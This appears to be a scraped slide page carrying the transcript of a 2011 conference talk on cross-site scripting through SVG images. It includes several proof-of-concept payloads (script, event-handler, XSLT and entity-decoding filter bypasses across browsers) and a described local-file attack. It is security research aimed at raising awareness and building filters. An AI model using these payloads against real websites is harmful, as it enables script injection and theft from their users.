Mike Wilcox
 
Academy PRO: HTML5 API graphics
Academy PRO: HTML5 API graphicsAcademy PRO: HTML5 API graphics
Academy PRO: HTML5 API graphics
Binary Studio
 
Rich Media Advertising with SVG and JavaScript
Rich Media Advertising with SVG and JavaScriptRich Media Advertising with SVG and JavaScript
Rich Media Advertising with SVG and JavaScript
Gjokica Zafirovski
 
SVG Icons and Screen Reader Accessibility
SVG Icons and Screen Reader AccessibilitySVG Icons and Screen Reader Accessibility
SVG Icons and Screen Reader Accessibility
Dennis Lembree
 
Html 5 svg
Html 5 svgHtml 5 svg
Html 5 svg
AbhishekMondal42
 
WHAT IS HTML5? (at CSS Nite Osaka)
WHAT IS HTML5? (at CSS Nite Osaka)WHAT IS HTML5? (at CSS Nite Osaka)
WHAT IS HTML5? (at CSS Nite Osaka)
Shumpei Shiraishi
 
Next generation Graphics: SVG
Next generation Graphics: SVGNext generation Graphics: SVG
Next generation Graphics: SVG
David Corbacho Román
 
Learn svg
Learn svgLearn svg
Learn svg
FitBlar Mit
 
Accessibility Hacks version 2
Accessibility Hacks version 2Accessibility Hacks version 2
Accessibility Hacks version 2
Graham Armfield
 
Accessibility Hacks Version 2
Accessibility Hacks Version 2Accessibility Hacks Version 2
Accessibility Hacks Version 2
Graham Armfield
 
Accessibility Hacks Wordcamp Manchester October 2018
Accessibility Hacks Wordcamp Manchester October 2018Accessibility Hacks Wordcamp Manchester October 2018
Accessibility Hacks Wordcamp Manchester October 2018
Graham Armfield
 
Streaming of SVG animations on the Web
Streaming of SVG animations on the WebStreaming of SVG animations on the Web
Streaming of SVG animations on the Web
Cyril Concolato
 
Canvas Based Presentation tool - First Review
Canvas Based Presentation tool - First ReviewCanvas Based Presentation tool - First Review
Canvas Based Presentation tool - First Review
Arvind Krishnaa
 
Echo HTML5
Echo HTML5Echo HTML5
Echo HTML5
Nathan Smith
 
Java script Session No 1
Java script Session No 1Java script Session No 1
Java script Session No 1
Saif Ullah Dar
 
Html5 Canvas and Mobile Graphics
Html5 Canvas and Mobile GraphicsHtml5 Canvas and Mobile Graphics
Html5 Canvas and Mobile Graphics
Engin Hatay
 
Ad

More from Mario Heiderich (9)

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Mario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
Mario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
Mario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
Mario Heiderich
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 
Web Wuermer
Web WuermerWeb Wuermer
Web Wuermer
Mario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
Mario Heiderich
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
Mario Heiderich
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!
Mario Heiderich
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Mario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
Mario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
Mario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
Mario Heiderich
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 
Web Wuermer
Web WuermerWeb Wuermer
Web Wuermer
Mario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
Mario Heiderich
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
Mario Heiderich
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!
Mario Heiderich
 

Recently uploaded (20)

Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
How analogue intelligence complements AI
How analogue intelligence complements AIHow analogue intelligence complements AI
How analogue intelligence complements AI
Paul Rowe
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
Big Data Analytics Quick Research Guide by Arthur Morgan
Big Data Analytics Quick Research Guide by Arthur MorganBig Data Analytics Quick Research Guide by Arthur Morgan
Big Data Analytics Quick Research Guide by Arthur Morgan
Arthur Morgan
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Rusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond SparkRusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond Spark
carlyakerly1
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded DevelopersLinux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Toradex
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Impelsys Inc.
 
2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx
Samuele Fogagnolo
 
How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?
Daniel Lehner
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdfSAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
Precisely
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
How analogue intelligence complements AI
How analogue intelligence complements AIHow analogue intelligence complements AI
How analogue intelligence complements AI
Paul Rowe
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
Big Data Analytics Quick Research Guide by Arthur Morgan
Big Data Analytics Quick Research Guide by Arthur MorganBig Data Analytics Quick Research Guide by Arthur Morgan
Big Data Analytics Quick Research Guide by Arthur Morgan
Arthur Morgan
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Rusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond SparkRusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond Spark
carlyakerly1
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded DevelopersLinux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Toradex
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Impelsys Inc.
 
2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx
Samuele Fogagnolo
 
How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?How Can I use the AI Hype in my Business Context?
How Can I use the AI Hype in my Business Context?
Daniel Lehner
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdfSAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
Precisely
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 

The Image that called me - Active Content Injection with SVG Files

  • 1. The Image that called me Active Content Injection with SVG Files A presentation by Mario Heiderich, 2011
  • 2. Introduction ● Mario Heiderich ● Researcher and PhD student at the Ruhr- University, Bochum ● Security Researcher for Microsoft, Redmond ● Security Consultant for XING AG, Hamburg ● Published author and international speaker ● HTML5 Security Cheatsheet / H5SC ● PHPIDS Project
  • 3. Today ● SVGs and the modern web ● What are SVGs? ● What are they capable of? ● Which browsers “understand” SVG? ● Why there are conflicted areas? ● And what does that have to do with security?
  • 4. SVG Images ● Scalable Vector Graphics ● XML based, therefore ● Versatile ● Accessible ● Compressible ● “Stylable” w. CSS ● Open ● Great for mobile devices ● Easy to parse and process ● Ancient format, older than 10 years ● Relations to HTML5, the living standard
  • 5. SVG History ● Proposed by several W3C members in 1998 ● Derived from Adobe Postscript and VML ● Developed in 1999 ● Currently at version 1.1 ● Version 1.2 still a working draft ● Might be overtaken by SVG 2.0 ● Good browser support ● Gecko, Webkit, Presto, and Trident
  • 7. SVG Family ● SVG Tiny 1.2 ● Designed for cellphones and smart-phones ● 47 Tags ● SVG Basic 1.1 ● Designed for handhelds, tablets and net-books ● 71 tags ● SVG Full 1.1 ● Full feature set ● 81 tags
  • 8. Features ● Geometrical shapes ● Circles, ellipses, squares, lines and more ● SVG fonts ● Font specific formatting and glyph styles ● Links ● Animations and Transformations ● Gradients and Effects ● Meta-data ● Scripting and Events ● Inclusion of arbitrary objects
  • 10. Scripting ● The following SVG executes JavaScript <svg xmlns=“http://www.w3.org/2000/svg“> <script> alert(1) </script> </svg> ● More examples?
  • 11. More Scripting <svg xmlns="http://www.w3.org/2000/svg"> <g onload="javascript:alert(1)"></g> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <animation xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <foreignObject xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg">  <set attributeName="onmouseover" to="alert(1)"/>  </svg> <svg xmlns="http://www.w3.org/2000/svg">  <handler  xmlns:ev="http://www.w3.org/2001/xml­events"  ev:event="load" >alert(1)</handler> </svg>
  • 12. Deploying SVGs ● Several ways of deploying SVGs, implemented by modern browsers ● Five important ones are: ● Opening the file directly ● Deployment via <object> or <embed> ● Deployment via <img> or <image> ● Deployment via CSS background/list- style/content/cursor ● In-line SVG
  • 13. Security Boundaries ● SVG capabilities based on deployment method ● A model, based on expectations ● Heterogeneous implementations ● And a whole new world of bugs and vulnerabilities
  • 14. XSS ● SVGs deployed via <img> and <image> tag should not execute JavaScript ● Same goes for SVGs used via CSS ● Or SVG fonts ● SVGs deployed via <iframe>, <embed> or <object> should, though ● So browsers need different approaches ● Learning by fixing?
  • 15. Local SVGs ● SVGs opened directly are allowed to script ● Imagine the following attack: ● Attacker uploads an image with an exciting motive to a server ● Victim navigates to the image, likes it, saves it locally, downloads folder or desktop ● Victim wants to watch the image again and double-clicks it ● Image is an SVG and executes JavaScript locally ● Attacker can read local files (same directory, sub-folders) ● Attacker can even load and start Java applets or worse ● Very likely too be used in real life attacks! ● Porn sites, Email attachments, Malware
  • 16. In-line SVG ● Suggested by the HTML5 specs ● Working on all modern browsers ● Opera 11 recently joined in ● No strict XML parser anymore ● <svg><circle r=40 fill=red></svg> ● See – no quotes, no trailing slash ● Reduced feature set ● <svg> introduces many new XSS vectors ● XSS filter bypasses
  • 17. Scoping ● SVG images are treated by browsers similarly to XML ● Same is for in-line SVG blocks ● XML treats plain-text tags differently ● Entities and canonical character representations are treated equally ● 0-Day filter bypasses ahead ● This enables a new attack technique on Firefox and other browsers ● DEMO ● And it's even worse ● In-line SVG “self-terminates” open HTML elements
  • 18. Opera ● A long history of SVG flaws ● JavaScript execution via SVG fonts ● XSS via CSS background images ● SVG containing XHTML renders HTML via <img> ● Today SVGs deployed via CSS/<img> cannot script anymore ● But - not all kinds of attacks need scripting to succeed ● DEMO
  • 19. Firefox ● SVG/HTML Chameleon <?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"> </iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>
  • 20. Opera ● Using entities to execute JavaScript ● innerHTML copy/decompile bug <a href="#">CLICKME 1</a> <svg style=display:none><style> &ast;{ - o&#45fabbalink&colon;&apos;javascript&colon;alert&lpar;1 &rpar;&apos;&semi; -o&#45fabbalink-source&colon;current <span/> <a href="#">CLICKME 2</a>
  • 21. More Opera ● SVG via favicon
  • 22. Chromium ● Incredible parser tolerance ● 1<svg <g onload=alert(1) </p>
  • 23. Firefox ● Enabling XSS via entity decoding ● Entities in <style> tags create new elements ● Even broken ones, half-broken to be honest ● Bug #650001 <svg> <style>&ltimg/src=x onerror=alert(1)//
  • 24. Other Browsers ● Firefox 4 crashed badly on SVGs embedding JS ● Chrome produces weird things when using <foreignObject> and <iframe> ● Opera deploys Java applets via SVG fonts ● And what about other XML related attack patterns? ● External entities ● SVG Tiny 1.2 Java Events ● Entity bombs ● Etc. etc. ● Some browsers support SVG Masks, perfect for click- jacking ● SVG and XBL? You tell me!
  • 25. Wrap-Up ● SVGs are not just images but mini-applications ● <img> tags can now deploy Java, PDF and Flash – and call you on Skype ● In-line SVG creates small XML islands enabling XML attacks on HTML websites ● SVG and XSLT work too, enabling DoS and other attacks ● Web-security and XML security, they meet again! ● And XXE is back – remember 2002's advisories? ● SVG is not getting enough attention in the security community ● SVG provides a lot of room for more security research
  • 26. Defense ● More difficult than one might assume ● No existing filter libs ● No good documentation ● XSS vectors are hard to comprehend ● New vectors coming up weekly ● SVG files should not be perceived as images ● Allowing SVG for upload == allowing HTML for upload ● SVG can embed, link or reference any kind of content over cross domain borders ● SVG provides new ways of payload obfuscation
  • 27. Future Work ● SVG Purifier ● Based on HTMLPurifier 4.3.0 ● Still very young ● Smoke-test has been published http://heideri.ch/svgpurifier ● More articles on the HTML5 Sec Cheatsheet Wiki ● Publications, to raise awareness ● Crouching Tiger – Hidden Payload, submission CCS 2011 ● More demo vectors on the H5SC to demonstrate impact ● OWASP research and documentation?
  • 28. Links ● Wikipedia on SVG http://en.wikipedia.org/wiki/Scalable_Vector_Graphics ● W3C SVG Working Group http://www.w3.org/Graphics/SVG/ ● SVG Full 1.1 (W3C) http://www.w3.org/TR/SVG11/ ● SVG Basic 1.1 and SVG Tiny 1.2 http://www.w3.org/TR/SVGMobile/ ● SVG 2.0 http://dev.w3.org/SVG/profiles/2.0/publish/intro.html ● Adobe's SVG Zone (for archaeologists) http://www.adobe.com/svg/ ● H5SC http://html5sec.org/ ● XSLT and SVG http://scarybeastsecurity.blogspot.com/20...riousity.html ● Opera SVG Bug http://heideri.ch/opera/ ● HTMLPurifier http://htmlpurifier.org/ ● JSBin http://jsbin.com/ ● SVGPurifier Smoke-Test http://heideri.ch/svgpurifier ● More SVG fun http://maliciousmarkup.blogspot.com/20...re-xml-fun.html
  • 29. Thanks ● Thanks for listening! ● Questions or Comments? ● Discussion and tool preview? ● Thanks to ● Gareth Heyes and Manuel Caballero from UNH ● Alexey Silin / LeverOne ● Erik of Opera ● Dave Ross of Microsoft